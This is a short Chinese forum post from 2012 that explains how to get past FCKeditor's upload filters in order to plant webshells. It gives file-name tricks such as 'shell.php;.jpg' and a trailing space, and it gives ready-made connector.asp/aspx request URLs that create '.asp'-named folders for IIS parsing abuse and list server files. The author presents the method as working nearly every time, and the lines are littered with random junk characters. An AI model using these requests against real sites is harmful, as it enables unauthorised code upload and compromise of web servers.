很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg; B, y- F/ P1 L: l6 s) {5 j7 q
6 z2 z$ {) o R5 `: B提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
$ }4 D3 R" w/ w+ o/ n9 V6 H. H
7 f- r2 B: G9 \7 Y/ A* t继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
4 ]) f- A L4 e: ]4 h8 G' z7 D& V0 A% C2 T* f: b- U! I. ?, {5 ?
突破建立文件夹:) }0 y2 ^# S: j# V: s- L+ J& r, l
: Z+ c6 r8 l: ]0 B7 Heditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp& v$ K* W! [/ L3 d' L
* T* `2 F$ }9 M; q9 e. e9 B5 V参数:
' d' y0 \1 ? j$ s8 v3 [" l- w/ U" e# H) \
当前目录名:CurrentFolder=/qing.asp
- {0 R" t3 L8 x; q: T, [
8 u% j/ \+ I! X K# G* [- f新的目录名:NewFolderName=x.asp
9 j/ q0 k: T: B1 \1 J6 t4 t/ M- v" U3 e: b5 o
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……/ g: |. G1 m0 I; C7 j
3 D! J4 \% M4 p0 a: m( J/ N那么 x.asp 就已经建立生成了,此方法百试百灵!' v( \) }, ?2 F; S
. E, u, _# I( e/ ^) F+ L' D+ w
新建文件夹参数 x.asp,基本都能搞定。
* t, P4 O$ _. N! r3 o$ J% q; }# C( p% Y
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建$ A. c$ L z* q2 ~ a: H0 h
! L1 u: a- `. K4 a, Q# t8 {1 O, n
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp; W2 D+ E: S% `; G- `: R' ?
, Y0 S8 d3 \0 g" G2 G0 P: e5 n获取文件列表
* j% A# L: k' o' F ` aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
7 g9 d {# O, Z
& r' {7 X9 C* r7 G$ i% v' i |
发表于 2012-12-31 09:27:09
收藏
支持
反对